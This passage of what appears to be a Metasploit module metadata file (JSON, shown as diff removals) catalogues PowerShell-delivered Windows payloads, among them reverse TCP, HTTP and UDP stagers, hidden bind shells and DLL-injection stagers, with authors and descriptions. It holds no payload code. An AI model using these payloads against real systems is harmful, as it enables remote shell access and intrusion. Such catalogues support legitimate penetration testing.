"cmd/windows/powershell/custom/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/custom/reverse_tcp_dns": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - 
"sf ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/custom/reverse_tcp_rc4": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": 
"cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/custom/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/custom/reverse_tcp_uuid": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back 
to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/custom/reverse_udp": { - "name": "Powershell Exec, Windows shellcode stage, Reverse UDP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/custom/reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "RageLtMan " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_udp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_udp" - }, - 
"payload_cmd/windows/powershell/custom/reverse_winhttp": { - "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_winhttp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_cmd/windows/powershell/custom/reverse_winhttps": { - "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 
16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_winhttps", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_winhttps" - }, - "payload_cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/dllinject/bind_hidden_tcp": { - "name": "Powershell Exec, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/dllinject/bind_ipv6_tcp": { - "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - 
"fullname": "payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/dllinject/bind_named_pipe": { - "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, 
- "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/dllinject/bind_nonx_tcp": { - "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/dllinject/bind_tcp": { - "name": "Powershell Exec, Bind TCP Stager (Windows x86)", - 
"fullname": "payload/cmd/windows/powershell/dllinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/dllinject/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/dllinject/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/dllinject/find_tag": { - "name": "Powershell Exec, Find Tag Ordinal Stager", - "fullname": 
"payload/cmd/windows/powershell/dllinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/find_tag", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/dllinject/reverse_http": { - "name": "Powershell Exec, Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - 
"is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_http", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_http" - }, - "payload_cmd/windows/powershell/dllinject/reverse_http_proxy_pstore": { - "name": "Powershell Exec, Reverse HTTP Stager Proxy", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_http_proxy_pstore", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_cmd/windows/powershell/dllinject/reverse_ipv6_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_ipv6_tcp", - 
"aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/dllinject/reverse_nonx_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": 
true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/dllinject/reverse_ord_tcp": { - "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/dllinject/reverse_tcp": { - "name": "Powershell Exec, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": 
null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/dllinject/reverse_tcp_allports": { - "name": "Powershell Exec, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": 
